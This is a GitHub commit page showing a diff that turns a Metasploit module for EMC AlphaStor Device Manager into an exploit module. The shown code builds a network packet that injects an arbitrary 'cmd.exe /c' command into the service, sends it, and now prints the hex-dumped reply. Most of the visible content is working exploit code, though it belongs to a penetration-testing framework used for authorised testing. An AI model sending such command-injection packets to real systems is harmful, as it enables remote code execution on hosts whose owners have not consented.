We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 892f72e commit d4a8b7eCopy full SHA for d4a8b7e
modules/auxiliary/admin/emc/alphastor_devicemanager_75_injection.rb renamed to modules/exploits/windows/emc/alphastor_device_manager_exec.rb
@@ -37,7 +37,6 @@ def initialize(info = {})
37
38
def run
39
connect
40
-
41
padding = Rex::Text.rand_text_alpha_upper(512)
42
43
packet = "\x75~ mminfo &cmd.exe /c #{datastore['CMD']} #{padding}"
@@ -46,6 +45,11 @@ def run
46
45
47
sock.put(packet)
48
+ res = sock.get_once
49
+ if res
50
+ print_status("#{Rex::Text.to_hex_dump(res)}")
51
+ end
52
+
53
disconnect
54
end
55
0 commit comments